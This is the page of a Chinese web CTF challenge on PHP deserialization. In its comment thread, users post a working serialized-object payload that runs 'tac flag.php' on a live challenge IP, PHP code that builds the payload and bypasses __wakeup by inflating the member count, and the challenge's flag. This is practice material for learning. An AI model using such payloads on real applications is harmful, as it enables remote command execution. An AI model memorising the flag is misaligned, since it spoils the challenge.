安慰奖WEB 未解决

分数: 35 金币: 5
题目作者: harry
一  血: dotast
一血奖励: 2金币
解  决: 1974
提  示:
描  述:
flag{}
评论
wxy1343 1年前

http://114.67.175.224:18718/index.php?code=O:3:"ctf":5:{s:11:"%00*%00username";s:5:"admin";s:6:"%00*%00cmd";s:19:"tac flag.php|base64";}

回复 0

wxy1343 1年前

flag{Unser1alize_and_2CE_Add}

回复 0

yuanyipaceandlove 1年前

class ctf { protected $username = 'admin' ; protected $cmd = 'ca$@t flag.php' ; } $a = new ctf(); $a = serialize($a); $a = str_replace(':2:{',':3:{',$a); $a=urlencode($a); echo $a;

回复 0

15683956189 2年前

特别要注意下url编码的问题

回复 0

泡椒控卫 2年前

https://blog.csdn.net/m0_57954651/article/details/127866733

回复 0

追风亚索 2年前

flag{Unser1alize_and_2CE_Add},flag是不是没变

回复 0

笨笨笨蛋 2年前

只要序列化的中的成员数大于实际成员数,即可绕过,虽然不是很懂,但是对这个有一个印象了 dirsearch很实用哦~

回复 2

YLMB001 2年前

为什么我序列化后的protected属性是带有%20*%20而不是%00*%00

回复 0

lysandria 2年前

注意protect属性。

回复 0

xiaoxiao972521 2年前

认输,查到backups后,哪哪没消息了。。。鬼知道起名index.php.bak,人与人的想法不一样。。index.php_bak_20220430

回复 0
SiiiirR0 2年前

万能的dirsearch

回复 0

WriteUp

image
小赵同学

3 金币

评分(3)

解题动态

sun_space 攻破了该题 2小时前
f13yf 攻破了该题 1天前
看writeup刷题 攻破了该题 4天前
288728 攻破了该题 4天前
songci1 攻破了该题 5天前
789123 攻破了该题 10天前
tingsi464 攻破了该题 11天前
雾島风起時 攻破了该题 11天前
forces 攻破了该题 11天前
liujiahaoctf 攻破了该题 13天前
卯壬在此 攻破了该题 13天前
33538626867 攻破了该题 14天前
nina123 攻破了该题 14天前
qgys 攻破了该题 17天前
19189756057 攻破了该题 18天前
Wsss12 攻破了该题 19天前
shangss 攻破了该题 19天前
ymkiras 攻破了该题 19天前
c2F1eQ 攻破了该题 21天前
11111in 攻破了该题 22天前
问题反馈